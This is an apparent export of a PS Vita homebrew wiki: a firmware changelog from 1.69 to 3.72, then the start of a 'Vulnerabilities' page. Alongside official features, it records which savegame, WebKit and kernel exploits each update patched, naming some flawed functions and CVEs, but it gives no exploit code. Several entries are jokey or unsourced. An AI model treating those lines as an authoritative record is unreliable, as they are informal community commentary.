|<br />
;System<br />
* Improved system stability<br />
* A savegame exploit within Super Collapse 3 has been patched, disallowing the usage of VHBL via the game.<ref>12 June 2012, [http://wololo.net/2012/06/12/ps-vita-firmware-1-69-patches-the-super-collapse-3-exploit/ PS Vita Firmware 1.69 patches the Super Collapse 3 exploit], Wololo.net</ref><br />
* Resolves a compatibility issue with the PlayStation Portable game ''Conception: Ore no Kodomo wo Undekure!''.<ref>http://andriasang.com/con1f1/conception_firmware/</ref> <br />
|-<br />
|align=center|'''1.691'''<br />July 4, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Resolves a compatibility issue with the PS Vita demo for ''Escape Plan''.<br />
|-<br />
|align=center|'''1.80'''<ref>[http://blog.us.playstation.com/2012/08/14/psone-classics-coming-to-ps-vita-via-the-latest-system-software-update-v1-80/ PSone Classics Coming to PS Vita via the latest System Software Update (v1.80) – PlayStation.Blog]. Blog.us.playstation.com (2012-08-14). Retrieved on 2013-08-23.</ref><br />August 28, 2012<br />
|<br />
;System<br />
* Users can now control the home screen, as well as some applications like [Music] and [Video], with the PS Vita system's buttons.<br />
* Notification settings under [Sound & Display Settings] have been moved to their own [Notification Settings] menu.<br />
* The items under [Date & Time] > [Date & Time Settings] have been changed.<br />
* A Japanese keyboard has been added.<br />
* Memory cards are now locked to PSN accounts, to prevent users from switching between accounts. The system will refuse to accept a memory card locked to another account unless the memory card is reformatted.<ref>http://i.imgur.com/4nsEl.jpg</ref><br />
* The layout of category lists have been improved in [Photos], [Music], and [Videos].<br />
* The [Notification Center] has been redesigned.<br />
* Importing content from a PC or PlayStation 3 has been improved.<br />
* The [Help] feature of the LiveArea has been improved.<br />
* Icons for some menu items have been changed.<br />
* Users can now report some errors to Sony Computer Entertainment.<br />
* Background colors have been changed.<br />
* Fixed a [[Vulnerabilities#Stack_buffer_overflow_in_sceSblDmac5EncDec|stack buffer overflow in sceSblDmac5EncDec]] and a ton of other vulns.<br />
<br />
;Remote Play<br />
* Added [Cross-Controller] feature to allow the PS Vita system to interact as a secondary controller with a PlayStation 3 system.<br />
<br />
;Games<br />
* Users can now play select PSone Classics from the PlayStation Store.<br />
* Users can now map more combinations of PSP system buttons to the PS Vita right analog stick when playing PSP games or minis. In addition, users can also map a PSP system button to each of the four corners of the PS Vita system touch screen.<br />
* [Import Saved Data] has been added to the LiveArea screen. This will only be shown for games that support this feature.<br />
<br />
;Photos<br />
* The MPO format can now be viewed on the PS Vita system. Additionally, it is now possible to transfer MPO files using a PlayStation 3 or PC using Content Manager. 3D and multi-angle viewing are not supported.<br />
<br />
;Music<br />
* Playlists in iTunes (10.6.3 or later), M3U, and M3U8 formats are now supported in [Music].<br />
* Playlists can also be transferred from a PS3 system.<br />
<br />
;Videos<br />
* Playback speed control and repeat play have been added to [Video].<br />
* When moving the progress bar during video playback, it now shows the image of the specified location in the video.<br />
* A thumbnail for videos will now be generated automatically when there is no thumbnail information available.<br />
* Users can now copy photos or videos to a PC or PS3 while a photo or video is displayed.<br />
<br />
;Friends<br />
* Users can now delete multiple friend requests simultaneously.<br />
<br />
;Near<br />
* [near] can now gather information of surrounding Wi-Fi access points without an Internet connection and will update location data based on this information at a later time.<br />
* The LiveArea screen for [near] has been improved and now shows lifetime statistics.<br />
<br />
;Group Messaging<br />
* There have been layout improvements made to [Group Messaging].<br />
* Users can now take photos using the camera to add as attachments in [Group Messaging].<br />
* The [New Message] button on the [Group Messaging] LiveArea screen has been removed.<br />
<br />
;Maps<br />
[Maps] has been improved by adding a button to the top of the screen to switch between [Search for Location] and [Search for Directions]. Users can also touch and hold a location on the map to place a flag.<br />
<br />
;Browser<br />
* The use of the rear touchpad for scrolling and zooming is now supported in the [Browser].<br />
* Users are no longer able to use a JavaScript bookmark trick to download YouTube videos in the [Browser].<br />
* A button has been added to the [Browser] to immediately go to the top of the page.<br />
<br />
;Party<br />
* Users can now view a history of up to 100 chat messages and information in [Party].<br />
|-<br />
|align=center|'''1.81'''<ref>[https://twitter.com/PlayStation/status/247851681428164609 Twitter / PlayStation: PS Vita system software update]. Twitter.com. Retrieved on 2013-08-23.</ref><br />September 17, 2012<br />
|<br />
;System<br />
* Software stability has been improved.<br />
* A savegame exploit within Monster Hunter Freedom Unite has been patched, disallowing the usage of VHBL via the game.<ref>18 September 2012, [http://wololo.net/2012/09/18/vita-firmware-1-81-is-out-patches-vhbl/ Vita Firmware 1.81 is out, patches VHBL], Wololo.net</ref><br />
<br />
;Treasure Park<br />
* An issue was resolved where the game would fail to load properly if the user had received too many treasure sheets.<br />
|-<br />
|}<br />
<br />
=== Version 2 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''2.00'''<ref>[http://blog.us.playstation.com/2012/11/13/playstation-plus-for-ps-vita-available-next-week-take-the-tour/ PlayStation Plus for PS Vita Available Next Week – Take the Tour – PlayStation.Blog]. Blog.us.playstation.com (2012-11-13). Retrieved on 2013-08-23.</ref><br />November 19, 2012<br />
|<br />
;System<br />
* System buttons can now be used in more applications.<br />
* Turkish has been added as a system language.<br />
* In [Settings], users can now set how they will be alerted depending on the type of notification.<br />
* [Disconnect Wi-Fi Connection Automatically] has been added to [Network] > [Wi-Fi Settings].<br />
* [PlayStation Network]<br />
* Support for PlayStation Plus has been added.<br />
* Users can now connect their PlayStation Network account to Twitter.<br />
* [Avatar], [Panel], [Online ID], [About Me] and [My Languages] under [PlayStation Network] > [Account Information] have been moved to the new category [Profile].<br />
* [PlayStation Mobile] has been added under [System].<br />
* Screenshots are now saved in the background.<br />
* Trophy synchronization is now performed in the background.<br />
* A savegame exploit within Urbanix has been patched.<br />
* Users can now delete screenshots or songs from PlayStation Portable games.<br />
<br />
;Content Manager<br />
* [Content Manager] has been redesigned.<br />
* Users can now transfer content to and from PlayStation Plus online storage, to and from a PS3, and to and from a PC via Wi-Fi.<br />
<br />
;Browser<br />
* The rendering engine has been improved.<br />
* The [Browser] now uses additional GPU processing power.<br />
* Tapping on a YouTube link will now open the respective video in the YouTube app.<br />
* The HTML5 and JavaScript engines have been upgraded.<br />
* Users can now send their current [Browser] URL using their Twitter settings.<br />
* Users can now access the [Browser] while in an application or game.<ref>Shuhei Yoshida on Twitter. https://twitter.com/yosp/status/270429820712783872</ref><br />
* A pointer can now be used (in conjunction with pressing L or R and tapping on the screen) to select links.<br />
<br />
;Apps<br />
* [Email] has been added as an application.<br />
<br />
;Maps<br />
* [Maps] can now display weather information for locations where it is available.<br />
<br />
;Near<br />
* The layout of [Near] has been revised.<br />
<br />
;Friends<br />
* The activities list for Friends has been moved to the LiveArea screen.<br />
* Users can now attach a comment when sending a friend request.<br />
* Users can now file a [Grief Report] for inappropriate comments when sent with a friend request.<br />
* TIFF, BMP, PNG, GIF, and MPO are now supported as file formats in [Group Messaging].<br />
<br />
;Videos<br />
* The PS Vita system can now display videos with 1080 resolution.<br />
* Videos can now display captioning.<br />
* Videos can now be played in slow motion.<br />
* Users can now skip chapters in videos.<br />
* Folders can now be transferred from a PS3 or PC to the PS Vita for [Photos] and [Videos].<br />
* When browsing lists in Music and Videos, titles will now scroll horizontally if they are too long.<br />
<br />
;PSone Classics<br />
* [Assign Touchscreen] and [Assign Rear Touch Pad] have been added to [Controller Settings].<br />
* [Custom] has been added to [Other Settings] > [Screen Mode].<br />
|-<br />
|align=center|'''2.01'''<ref>[http://www.playstationlifestyle.net/2012/12/03/ps-vita-firmware-v2-01-is-live-download-now/ PS Vita Firmware v2.01 is Live, Download Now]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 3, 2012<br />
|<br />
;PlayStation Plus<br />
* Issue with the [Upload Automatically] setting for saved data has now been corrected.<br />
<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.02'''<ref>[http://www.playstationlifestyle.net/2012/12/18/playstation-vita-system-software-version-2-02-now-available-for-download/ PlayStation Vita System Software Version 2.02 Now Available For Download]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 19, 2012<br />
|<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.05'''<ref>[http://www.playstationlifestyle.net/2013/01/22/ps-vita-system-software-version-2-05-likely-coming-today-seems-to-be-mandatory/ PS Vita System Software Version 2.05 Likely Coming Today, Seems to be Mandatory]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><br />January 24, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in UNO game. <br />
|-<br />
|align=center|'''2.06'''<ref>[https://twitter.com/PlayStation/status/311264776577765376 Twitter / PlayStation: Heads up - PS Vita v2.06 software]. Twitter.com. Retrieved on 2013-08-23.</ref><br />March 12, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in Dissidia Duodecim PSP game.<br />
* Closes JavaScript URL spoofing exploit in Browser.<ref>[http://www.securityfocus.com/archive/1/525576 Sony Playstation Vita Browser - firmware 2.05 - Adressbar spoofing]. Securityfocus.com. Retrieved on 2013-12-09.</ref><br />
|-<br />
|align=center|'''2.10'''<ref>[http://blog.us.playstation.com/2013/04/09/ps-vita-system-software-update-v-2-10/ PS Vita System Software Update (v.2.10) – PlayStation.Blog]. Blog.us.playstation.com (2013-04-09). Retrieved on 2013-08-23.</ref><ref>[http://uk.playstation.com/psvita/support/system-software/detail/item596991/Update-features-%28ver-2-10%29/ Update features (ver 2.10) - PS Vita System Software]. Uk.playstation.com. Retrieved on 2013-08-23.</ref><br />April 9, 2013<br />
|<br />
;System<br />
* Users can now create folders, with a maximum of 10 icons per folder, and up to 100 icons (including folders) on the home screen.<br />
* Users can now verify which PS Vita card is in their system by looking at the information bar.<br />
* Users can now save home screen layouts per PS Vita card.<br />
* When [Mute Automatically] is toggled in [Settings], the PS Vita will mute speakers when a headset is unplugged. Similarly, music will now pause if a headset is unplugged when the music app is used.<br />
* [Use Wi-Fi in Power Save Mode] has been added to [Power Save Settings].<br />
* [Disconnect Wi-Fi Connection Automatically] has been removed.<br />
* Patches an exploit in the game Apache Overkill.<ref>09 September 2013, [http://wololo.net/2013/04/10/mandatory-vita-2-10-update-live-and-blocks-apache-overkill-exploit/ Mandatory Vita 2.10 Update Live and Blocks Apache Overkill Exploit], Wololo.net</ref><br />
<br />
;PlayStation Plus<br />
* PlayStation Plus members can now automatically update [PlayStation Mobile] software and upload game save data using a 3G connection.<br />
* Users can now upload or download game save data using a 3G network.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been added (a memory card is required; some videos are not supported).<br />
<br />
;Email<br />
* Enhancements to [Email] now allow users to view HTML messages, add multiple email addresses to contacts, and search messages.<br />
<br />
;Group Messaging<br />
* Users can now send messages to multiple recipients.<br />
<br />
;Photos<br />
* Still images can now be displayed in high resolution when zoomed in.<br />
<br />
;Content Manager<br />
* Users can now check for system updates when plugging their PS Vita into their PS3 system. The system version of the PS3 must be 4.40 or higher.<br />
* Users can now add a name for the PS Vita backup data when saving to a PS3 or PC. The system version of the PS3 must be 4.40 or higher, and the Content Manager Assistant application must be updated.<br />
<br />
;PlayStation Store<br />
* When reporting PlayStation Mobile content as inappropriate, users can now include details.<br />
|-<br />
|align=center|'''2.11'''<ref>[http://www.psu.com/a019092/PS-Vita-firmware-211-is-now-live [UPDATE&#93; PS Vita firmware 2.11 is now live - PlayStation Universe]. Psu.com (2013-04-16). Retrieved on 2013-08-23.</ref><br />April 16, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
* Stabilizes the playback of certain titles.<br />
|-<br />
|align=center|'''2.12'''<ref>[http://terminalgamer.com/2013/05/07/optional-ps-vita-system-update-2-12-live-now/ Optional PS Vita System Update 2.12 Live Now]. Terminal Gamer (2013-05-08). Retrieved on 2013-08-23.</ref><br />May 8, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
|-<br />
|align=center|'''2.50'''<br />''Pre-installed Only''<br><br />
First found on October 10, 2013<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PCH-2000 model.<br />
*It adds support for PlayStation Vita Slim (PCH-2000), but otherwise the firmware is identical to the previous version (2.12).<br />
|-<br />
|align=center|'''2.60'''<ref>[http://www.playstationlifestyle.net/2013/08/05/ps-vita-firmware-update-v2-60-released-download-now/ PS Vita Firmware Update v2.60 Released, Download Now]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><ref>[http://wololo.net/2013/08/06/psvita-mandatory-ofw-2-60-now-live/ PSVITA Mandatory OFW 2.60 Now Live ·]. Wololo.net (2013-08-06). Retrieved on 2013-08-23.</ref><br />August 5, 2013<br />
|<br />
* Default release firmware for the PlayStation Vita TV in Japan.<br />
;System<br />
* [Devices] has been added under [Settings].<br />
** [Bluetooth Settings] has been moved to [Devices].<br />
* The Quick Access Menu when the PS button is held has been improved.<br />
* Stability improvements.<br />
* Anti-aliasing has been applied to home screen icons.<br />
* Closes exploit in Gamocracy One: Legend of Robot.<br />
* Closes undisclosed exploit in Pool Hall Pro.<br />
* Fixes screenshot compression bug for ''Gravity Rush'' and ''Everybody's Golf'' introduced in firmware 2.10.<br />
<br />
;LiveArea<br />
* The LiveArea for [Content Manager] and [Photos] has been updated.<br />
<br />
;PlayStation Plus<br />
* A [PlayStation Plus] icon has been added to the LiveArea to allow users to easily upload or download saved data.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been extended.<br />
<br />
;Content Manager<br />
* Users can now use content on a remote system before transferring it.<br />
<br />
;Trophies<br />
* Trophies can now be hidden.<br />
|-<br />
|align=center|'''2.61'''<ref>[http://www.playstationlifestyle.net/2013/08/28/ps-vita-system-firmware-update-v2-61-coming-soon-improves-some-software-stability/ PS Vita System Firmware Update v2.61 Coming Soon, Improves Some Software]. PlayStation LifeStyle. Retrieved on 2013-08-28.</ref><br />August 28, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within Arcade Darts and other games has been patched, disallowing the usage of VHBL via the game.<ref>29 August 2013, [http://wololo.net/2013/08/29/ps-vita-compulsory-firmware-2-61-is-out-patches-the-arcade-exploits/ PS Vita compulsory Firmware 2.61 is out, patches the ‘Arcade’ exploits], Wololo.net</ref><br />
|-<br />
|}<br />
<br />
=== Version 3 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''3.00'''<br />November 5, 2013<br />
|<br />
;System<br />
* [Parental Controls] has been added to the home screen.<br />
* Future system software updates can now be downloaded automatically.<br />
* Portuguese (Portugal) language has been updated to reflect changes due to the Portuguese Language Orthographic Agreement of 1990.<br />
* System stability has been improved.<br />
* Several Game Exploits, Fieldrunners and others, that were actually undisclosed, got fixed. This disallows the usage of VHBL via these games.<ref>11 November 2013, [http://wololo.net/2013/11/11/sony-patched-up-to-20-exploits-with-vita-firmware-3-00/ Sony patched up to 20 exploits with Vita firmware 3.00], Wololo.net</ref><br />
<br />
;Trophies<br />
* Trophies for PS4 software can now be displayed on PS Vita.<br />
<br />
;Content Manager<br />
* Users can now transfer content to and from a PS3 with Wi-Fi on the same network, when the PS3 is version 4.50 or newer.<br />
<br />
;Messages<br />
* [Group Messaging] has been renamed to [Messages].<br />
* The icon has been changed.<br />
* Messages can now be sent to and from the PS4 and mobile devices running the PlayStation App.<br />
<br />
;Email<br />
* Contacts can now be synchronized from Gmail and Yahoo! Mail using CardDAV.<br />
<br />
;Party<br />
* The icon has been changed.<br />
* Users can now voice and text chat with friends on PS4.<br />
<br />
;Remote Play<br />
* [Remote Play] has been renamed to [PS3 Remote Play].<br />
<br />
;PS4 Link<br />
* [PS4 Link] has been added to the home screen.<br />
<br />
;Friends<br />
* The layout for the [Friends] application has changed. There are now four tabs available:<br />
** Find Player on PSN<br />
** Friends<br />
** Friend Requests<br />
** Players Blocked<br />
<br />
;Photos<br />
* Users can now take panoramic photos with the PS Vita's camera.<br />
* Panoramic photos can be viewed using the system's motion sensor.<br />
|-<br />
|align=center|'''3.01'''<ref name="PSVita301">[http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits]. Wololo.net. Retrieved on 2013-12-10.</ref><br />December 5, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within several games has been patched, disallowing the usage of VHBL/eCFW via the games.<ref>10 December 2013, [http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits], Wololo.net</ref><br />
|-<br />
|align=center|'''3.10'''<ref name="PSVita310">[http://blog.eu.playstation.com/2014/03/25/playstation-vita-system-software-update-3-10-coming-soon/ PS Vita System Software Update 3.10 Coming Soon]. PlayStation Blog. Retrieved on 2014-03-25.</ref><br />March 25, 2014<br />
|<br />
;System<br />
* The number of applications that can be displayed on the home screen has increased to 500.<br />
* [Adjust Daylight Savings Automatically] has been added.<br />
* [30 minutes] has been added to [Enter Standby Mode Automatically].<br />
* (''Japan only'') PocketStation functionality has been integrated into the system software.<ref name=fami310>2014-03-25, [http://www.famitsu.com/news/201403/25050481.html PS Vita、PS Vita TVのシステムソフトウェア バージョン3.10が提供開始、カレンダー機能追加など盛りだくさん!], Famitsu</ref><br />
* Added DualShock 4 compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Added PlayStation Mobile compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Use of an [External Keyboard] is now supported (for example, PlayStation Bluetooth Wireless Keypad).<br />
* Savegame exploits in various exploit titles got fixed.<br />
* Savegame exploits in various additional undisclosed exploit titles got fixed as well.<br />
* Internal firmware changes now prevent the execution of bigger files (e.g. TN-V/ARK eCFW) via exploits in PSP Minis, if these PSP Minis lack network functions.<br />
<br />
;Apps<br />
* Added a new [Calendar] application that synchronizes with Google Calendar.<br />
<br />
;Content Manager<br />
* Added [Manage Content on Memory Card] option.<br />
<br />
;Messages<br />
* Messages sent and received now include voice messages.<br />
<br />
;Parental Controls<br />
* Access to the PS Store can now be restricted.<br />
* Added a children's age guide.<br />
<br />
;Music<br />
* Users can now search on connected devices such as a PC.<br />
<br />
;Video<br />
* Users can now sort content by size.<br />
<br />
;Photo<br />
* [Rotate Screen Automatically] has been added.<br />
* [Freeform] has been added to the list of panoramic options.<br />
|-<br />
|align=center|'''3.12'''<ref name="PSVita312">[http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/ PS Vita mandatory firmware 3.12 available – Fixes memory card problems]. Wololo.net. Retrieved on 2014-03-28.</ref><br />March 28, 2014<br />
|<br />
;System<br />
* System software stability during use of some features has been improved.<br />
* Fixes problems with bigger memory cards,<ref>http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/</ref> which occurred in system software 3.10.<br />
|-<br />
|align=center|'''3.15'''<br />April 30, 2014<br />
|<br />
;System<br />
* ''(PS Vita TV only)'' Full functionality for PlayStation Vita TV remote play with PS4 systems added.<ref>2014-04-17, [http://www.famitsu.com/news/201404/17051793.html PS4“システムソフトウェア バージョン1.70”の内容が公開、ニコニコ生放送や各配信サービス内の動画アーカイブへの対応、HDCP信号オフなど], Famitsu</ref><ref>2014-04-17, [http://weekly.ascii.jp/elem/000/000/214/214642/ PS4がバージョン1.70へのアップデートでニコ生HD配信などに対応!], Weekly ASCII</ref><br />
* Savegame exploits in various undisclosed exploit titles have been fixed.<ref>http://wololo.net/2014/04/30/ps-vita-firmware-3-15-is-now-available/</ref><br />
<br />
; PS4 Link<br />
* Linking PS Vita with PS4 is now easier.<br />
|-<br />
|align=center|'''3.18'''<br />August 7, 2014<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*No entry sign changed.<br />
|-<br />
|align=center|'''3.20'''<br />''Pre-installed Only''<br><br />
First found on October 14, 2014<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PlayStation TV in North America and Europe.<br />
*It allows the usage of non-Asian PSN accounts on the PS TV, if set up via PS3 or proxies, but otherwise the firmware is identical to the previous version (3.18).<br />
|-<br />
|align=center|'''3.30'''<br />October 2, 2014<br />
|<br />
;System<br />
* [Theme & Background] has been added to [Settings].<br />
* Full array of languages has been added to [External Keyboard] settings (previously was Japanese and US English only).<ref name=330jp/><br />
* [Import Saved Data] feature has now been fixed after becoming broken with release of system software 3.15.<br />
* PS4 Remote Play now supports two players simultaneously.<ref name=330jp/><br />
* Added timezone for Nouméa and daylight savings support for Wellington, New Zealand.<br />
* "Intellectual Property Notices" are now listed in the app menu on the LiveArea screen.<br />
* A savegame exploit, several kernel exploits, a WebKit exploit and some internal system flaws have been fixed.<ref>http://wololo.net/2014/10/04/ps-vita-firmware-3-30-what-is-patched-what-is-still-working/</ref><br />
<br />
;Trophies<br />
* Trophy rarity can now be viewed.<br />
<br />
;Calendar<br />
* Users can now attach and send events created in [Calendar] to [Messages] and [Email]. Recipients can save those events in their own calendars.<br />
* Users can now add Friends and other players to events created in [Calendar].<br />
* The Calendar app’s LiveArea now supports the next six tagged events.<ref name=330jp/><br />
<br />
;Browser<br />
* The system's [Browser] now supports closing all open windows.<ref name=330jp>[http://www.jp.playstation.com/psvita/update/ PlayStation®Vita/PlayStation®TV システムソフトウェア バージョン3.30 アップデートについて], Accessed 2 October 2014</ref><br />
* Improvements to the [Browser]'s ability to load pages and compatibility with HTML5/Javascript content have been made. HTML5test score increased from 291 to 345.<ref>2014-10-01, [http://www.psnstores.com/2014/10/ps-vita-system-update-3-30-now-live-adds-themes-improves-browser-allows-ps-vita-tv-to-use-na-accounts/ PS Vita System Update 3.30 Now Live: Adds Themes, Improves Browser, Allows PS Vita TV To Use NA Accounts], PSNStores</ref><br />
<br />
;Content Manager<br />
* Support for Content Manager Assistant with Windows XP and Mac OS X Leopard has been discontinued.<br />
<br />
;PS TV<br />
* The name of the VTE-1000 series has been changed to PlayStation TV or PS TV within system applications.<ref>2014年10月2日, [http://www.jp.playstation.com/info/support/sp_20141002_psvitatv.html PlayStation®Vita TVのシステムソフトウェア上の表記変更について], Sony Computer Entertainment Japan</ref><br />
* A maximum of 4 wireless controllers can be connected to the PS TV. The number of players depends on the game or application.<br />
* North American and European PSN accounts can now be used with the PlayStation TV.<br />
* Detailed warning prompt added to Standby/Shutdown screen on PlayStation TV devices.<br />
|-<br />
|align=center|'''3.35'''<br />October 28, 2014<br />
|<br />
;System<br />
*A savegame exploit in the PSP game Go! Sudoku has been fixed.<br />
*Enables compatibility with the Live from PlayStation app (requires firmware 3.30 or higher) available to download from the PS Store.<br />
;PS4 Link<br />
*Four-player Remote Play support to PlayStation TV.<br />
*Users can now adjust the video quality for Remote Play on the PS TV system according to the network environment.<br />
|-<br />
|align=center|'''3.36'''<br />January 14, 2015<br />
|<br />
;System<br />
*Fixes some internal functions of the PS Vita's PSP emulator.<br />
*A savegame exploit in an undisclosed PSP game has been fixed.<br />
*The PSP Emulator of the PS Vita has been updated to PSP firmware 6.61.<br />
|-<br />
|align=center|'''3.50'''<br />March 26, 2015<br />
|<br />
;System<br />
*Adds support for streaming in 60 frames per second while using PS4 Remote Play. If 60fps is enabled, the PS4 system will be unable to record gameplay while using Remote Play.<br />
*Accessibility has been added to the settings menu, with options such as zooming, inverted colors, closed captions, enlarged text and increased contrast options.<br />
*The Maps application has been removed.<br />
*'near' will not show Maps and other related content anymore.<br />
*PSN has been renamed to PlayStation Network<br />
*The [Chat] setting under [PlayStation Network] > [Sub Account Management] has been renamed as [Chat/User-Generated Media].<br />
*Sub account users can now be restricted from sending and receiving [Messages from other players] in [Messages].<br />
*The online-status of friends is no longer shown with a pop-up box.<br />
*Fixed savedata exploits in various PSP games (Arcade Darts, Patapon 2, Numblast, etc.).<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<br />
*30% of the reserved 256MB memory for the operating system now free for games.<br />
|-<br />
|-<br />
|align=center|'''3.51'''<br />May 13, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Additional fixes for the "custom bubble" exploit.<br />
*Fixes lag some users reported on the home screen of the system.<br />
|-<br />
|align=center|'''3.52'''<br />June 23, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Revoked PlayStation Mobile.<ref name="Rejuvenate">http://wololo.net/2015/06/24/ps-vita-firmware-3-52-is-out-revokes-psm-support-effectively-patching-the-rejuvenate-hack-do-not-update/</ref><br />
*Fixed the "Rejuvenate" exploit.<ref name="Rejuvenate" /><br />
|-<br />
|align=center|'''3.55'''<ref>https://web.archive.org/web/20150930182904/https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />September 30, 2015<br />
|<br />
;System<br />
*Fixed the Mail Writer exploit.<ref name="Fail-Mail">http://wololo.net/2015/09/30/playstation-vita-firmware-3-55-is-now-available-does-it-patch-the-fail-mail-flaw/</ref><br />
*Fixes several PSP usermode exploit.<ref name="Fail-Mail" /><br />
;PS4 Link<br />
*You can now adjust the setting for video resolution when using remote play on a PS Vita system. Select (PS4 Link) > [Start] > (Options) > [Settings] > [Video Quality for Remote Play] > [Resolution]. <br />
** If video or audio skips during playback, try selecting [Low (360p)] to help improve the quality.<br />
;Parental Controls<br />
*You can now restrict [Email] from starting.<br />
|-<br />
|align=center|'''3.57'''<ref>http://gematsu.com/2016/01/ps3-ps-vita-ending-facebook-link-support</ref><br />January 20, 2016<br />
|<br />
;System<br />
*Removed the system-wide Facebook integration.<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<ref>http://wololo.net/2016/01/20/playstation-vita-system-software-3-57-is-now-available-fixes-currently-testing/</ref><br />
|-<br />
|align=center|'''3.60'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />April 6, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|align=center|'''3.61'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />August 8, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Fixed <code>sceIoDevctl</code> uninitialized stack memory leak used by HENkaku.<br />
*Fixed WebKit <code>JSArray::sortCompactedVector</code> vulnerability used by HENkaku.<br />
|-<br />
|align=center|'''3.63'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />November 1, 2016<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Fixed <code>sceNetIoctl</code> use-after-free used by HENkaku.<br />
|-<br />
|align=center|'''3.65'''<br />April 18, 2017<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Fixed PSP emulator kernel exploit used by ARK.<br />
|-<br />
|align=center|'''3.67'''<br />November 28, 2017<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
<hr><br />
*Twitter dialog updated.<br />
*Calendar icon updated.<br />
*Added TLS 1.2 support in the web browser.<br />
*Fixed Ensō exploit.<br />
|-<br />
|align=center|'''3.68'''<br />April 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Minor WebKit update (vector index masking).<ref name="WebKit-368">https://gist.github.com/StepS-/436098ac8979217d263bab2edab11ee5</ref><br />
*Fixed some devkit-specific kernel bugs.<ref name="DevKit-367">[https://twitter.com/theflow0/status/985137344570372096 Sony has fixed 3 kernel bugs in 3.68, which combined, could lead to kernel code execution on a devkit]. TheFloW (@theflow0) on Twitter</ref><ref name="DevKit-367-sceMotionDevGetEvaInfo">[https://twitter.com/theflow0/status/984919058863845378 sceMotionDevGetEvaInfo could leak 0x48 bytes of kernel stack]. TheFloW (@theflow0) on Twitter</ref><br />
|-<br />
|align=center|'''3.69'''<br />September 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Fixed some bugs in SceNgs<br />
*SSL library updated (along with other networking libraries that uses SceSsl), two new root certificates added<br />
|-<br />
|align=center|'''3.70'''<br />January 14, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Changed the enc key<br />
*Forgot to change any other keys. Oops!<br />
|-<br />
|align=center|'''3.71'''<br />July 23, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Fixed the Trinity exploit chain<br />
|-<br />
|align=center|'''3.72'''<br />August 27, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|}<br />
<br />
[[Category:Firmware]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=11408Vulnerabilities2019-08-28T23:03:45Z<p>Xyz: </p>
<hr />
<div>== Userland ==<br />
<br />
=== WebKit exploits ===<br />
<br />
==== WebKit exploits in Email app ====<br />
<br />
Implemented by xyz, in order HENkaku to be launched offline.<br />
<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup].<br />
<br />
==== WebKit 531.22.8 (Vita FW <= 1.81) ====<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit CVE-2010-1807 on the parseFloat() function using a Nan as the arg.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
==== WebKit 536.26 (Vita FW 2.00-3.20) (CVE-2012-3748) (PSA 2013-09-03-1) ====<br />
<br />
Ported to PSVita by many many people. Patched on FW 3.30.<br />
<br />
